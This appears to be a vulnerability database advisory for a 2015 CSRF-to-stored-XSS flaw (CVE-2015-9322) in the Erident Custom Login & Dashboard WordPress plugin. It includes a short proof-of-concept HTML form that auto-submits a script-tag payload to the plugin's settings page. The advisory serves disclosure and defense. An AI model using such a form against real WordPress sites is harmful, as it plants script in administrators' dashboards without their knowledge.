Lucene search
James HookerWPEX-ID:ED37E254-7FBC-44DB-AA3D-031ECF144C6DHistoryJun 18, 2015 - 12:00 a.m.
Erident Custom Login & Dashboard 3.4-3.4.1 - Stored Cross-Site Scripting (XSS)
2015-06-1800:00:00
James Hooker
19
EPSS
0.001
Percentile
31.5%
The Erident Custom Login and Dashboard plugin exposes a call to the update_option method, when a specific POST field is posted to the plugins setting screen. No CSRF token is used, and as such if an Administrative user can be tricked into visiting a site with a malicious form, it is possible to trigger a Stored Cross-Site Scripting attack in the admin dashboard by utilising this unsafe method call. The vulnerable method call is located on line 312 of erident-custom-login-and-dashboard/er-custom-login.php.
<form id="form" method="POST" target="http://localhost/wp-admin/options-general.php?page=erident-custom-login-and-dashboard">
<input type="hidden" name="er_options_up[dashboard_data_left]" value="Powered by YourWebsiteName<script>alert(1)</script>"/>
</form>
<script>document.getElementById("form").submit();</script>References
Related
cvelist
cvelist
CVE-2015-9322
2019-08-16 20:19:50
wpvulndb
wpvulndb
cve
cve
CVE-2015-9322
2019-08-16 21:15:10
prion
prion
Cross site request forgery (csrf)
2019-08-16 21:15:00
nvd
nvd
CVE-2015-9322
2019-08-16 21:15:10